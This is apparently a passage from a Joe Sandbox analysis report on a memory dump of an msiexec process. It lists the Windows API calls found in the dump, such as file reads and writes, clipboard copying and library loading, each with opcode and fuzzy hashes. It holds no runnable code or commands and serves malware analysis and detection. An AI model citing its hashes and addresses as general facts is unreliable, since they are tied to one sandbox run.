                                                                                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                          APIs
                                                                                          • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3934441357-0
                                                                                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                          APIs
                                                                                          • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID:
                                                                                          • API String ID: 3664257935-0
                                                                                          • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                          • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                          APIs
                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                          • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                          • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                          • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                          APIs
                                                                                          • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                          APIs
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@
                                                                                          • String ID:
                                                                                          • API String ID: 613200358-0
                                                                                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                          APIs
                                                                                          • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID:
                                                                                          • API String ID: 3664257935-0
                                                                                          • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                          • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                          • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                          • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                          APIs
                                                                                          • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnumNamesResource
                                                                                          • String ID:
                                                                                          • API String ID: 3334572018-0
                                                                                          • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                          • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                          • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                          • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                          APIs
                                                                                          • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID:
                                                                                          • API String ID: 3664257935-0
                                                                                          • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                          • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                          • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                          • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                          APIs
                                                                                          • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseFind
                                                                                          • String ID:
                                                                                          • API String ID: 1863332320-0
                                                                                          • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                          • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                          • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                          • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                          APIs
                                                                                          • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3188754299-0
                                                                                          • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                          • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                          • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                          • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                          • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                          • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                          • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 004095FC
                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                            • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                            • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                          • String ID:
                                                                                          • API String ID: 3655998216-0
                                                                                          • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                          • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                          • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                          • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00445426
                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                          • String ID:
                                                                                          • API String ID: 1828521557-0
                                                                                          • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                          • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                          • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                          • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                          APIs
                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                            • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                          • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??2@FilePointermemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 609303285-0
                                                                                          • Opcode ID: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                                          • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                          • Opcode Fuzzy Hash: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                                          • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmp
                                                                                          • String ID:
                                                                                          • API String ID: 2081463915-0
                                                                                          • Opcode ID: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                                          • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                          • Opcode Fuzzy Hash: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                                          • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                          APIs
                                                                                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$CloseCreateErrorHandleLastRead
                                                                                          • String ID:
                                                                                          • API String ID: 2136311172-0
                                                                                          • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                          • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                          • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                          • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                          APIs
                                                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??2@??3@
                                                                                          • String ID:
                                                                                          • API String ID: 1936579350-0
                                                                                          • Opcode ID: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                          • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                          • Opcode Fuzzy Hash: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                          • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: free
                                                                                          • String ID:
                                                                                          • API String ID: 1294909896-0
                                                                                          • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                          • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                          • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                          • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: free
                                                                                          • String ID:
                                                                                          • API String ID: 1294909896-0
                                                                                          • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                          • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                          • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                          • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: free
                                                                                          • String ID:
                                                                                          • API String ID: 1294909896-0
                                                                                          • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                          • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                          • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                          • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                          APIs
                                                                                          • EmptyClipboard.USER32 ref: 004098EC
                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                          • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                          • GetLastError.KERNEL32 ref: 0040995D
                                                                                          • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                          • GetLastError.KERNEL32 ref: 00409974
                                                                                          • CloseClipboard.USER32 ref: 0040997D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                          • String ID:
                                                                                          • API String ID: 3604893535-0
                                                                                          • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                          • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                          • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                          • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeLoadMessageProc
                                                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                          • API String ID: 2780580303-317687271
                                                                                          • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                          • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                          • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                          • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                          APIs
                                                                                          • EmptyClipboard.USER32 ref: 00409882
                                                                                          • wcslen.MSVCRT ref: 0040988F
                                                                                          • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                          • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                          • CloseClipboard.USER32 ref: 004098D7
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                          • String ID:
                                                                                          • API String ID: 1213725291-0
                                                                                          • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                          • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                          • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                          • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32 ref: 004182D7
                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                          • LocalFree.KERNEL32(?), ref: 00418342
                                                                                          • free.MSVCRT ref: 00418370
                                                                                            • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,771ADF80,?,0041755F,?), ref: 00417452
                                                                                            • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                          • String ID: OsError 0x%x (%u)
                                                                                          • API String ID: 2360000266-2664311388
                                                                                          • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                          • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                          • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
